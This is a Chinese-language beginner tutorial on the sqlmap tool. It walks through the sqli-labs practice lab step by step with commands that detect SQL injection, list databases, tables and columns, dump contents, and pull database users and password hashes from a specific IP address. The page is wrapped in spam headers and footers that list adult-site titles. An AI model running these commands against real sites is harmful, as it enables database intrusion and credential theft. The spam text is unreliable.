国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

SQL注入之sqlmap入門學習

瀏覽:4日期:2023-05-02 10:03:12
目錄
  • 一、判斷是否存在注入點
  • 二、查詢當前用戶下所有數據庫
  • 三、獲取數據庫中的表名
  • 四、獲取表中的字段名
  • 五、獲取字段內容
  • 六、獲取數據庫的所有用戶
  • 七、獲取數據庫用戶的密碼
  • 八、獲取當前網站數據庫的名稱
  • 九、獲取當前網站數據庫的用戶名稱

原來sql注入如此簡單

以SQL注入靶場sqli-labs第一關為例,進行sqlmap工具的使用分享。

一、判斷是否存在注入點

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有圖中白色背景的 則判斷出有注入點

二、查詢當前用戶下所有數據庫

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五個表

三、獲取數據庫中的表名

選取一個challenges數據庫,獲取此庫的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables  

四、獲取表中的字段名

選取表T5M0QG6FM2,獲取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數據庫的所有用戶

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用該命令就可以列出所有管理用戶

七、獲取數據庫用戶的密碼

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當前網站數據庫的名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當前的數據庫是 security

九、獲取當前網站數據庫的用戶名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

當前用戶是root

到此這篇關于SQL注入之sqlmap入門學習的文章就介紹到這了,更多相關sqlmap入門內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
主站蜘蛛池模板: 视频一区在线播放 | 亚洲欧美日本人成在线观看 | 成人天堂av | 美女一丝不佳一级毛片香蕉 | 色欧美hdvideosxs4k | 国产精品一区二区综合 | 456主播喷水在线观看 | 特级淫片欧美高清视频蜜桃 | 欧美偷拍小视频 | 国产成人综合亚洲 | 亚洲精品久久久午夜伊人 | 亚洲国产成人久久精品影视 | 国产欧美在线观看不卡一 | ⅹxx中国xxx人妖 | 久草在线青青草 | 欧美亚洲日本国产综合网 | 日韩欧美精品在线视频 | 一级a毛片免费观看 | 久久成年片色大黄全免费网站 | 国产美女精品一区二区三区 | 国产精品96久久久久久久 | 久久精品观看 | 久久99精品热在线观看15 | 亚洲国产成人久久综合区 | 亚洲精品第一第二区 | 亚洲精品在线影院 | 国产v日韩v欧美v精品专区 | 亚洲欧美性视频 | 女人张腿让男桶免费视频网站 | 亚洲欧洲日产v特级毛片 | 国产 一二三四五六 | 韩国美女爽快毛片免费 | 九九视频精品在线 | 一本综合久久国产二区 | 动漫精品一区二区 | 国产精品视频男人的天堂 | 国内精品久久久久久久影视麻豆 | 男女很舒服爽视频免费 | 国产一区二区高清在线 | 久久久日韩精品国产成人 | 91精品国产高清久久久久 |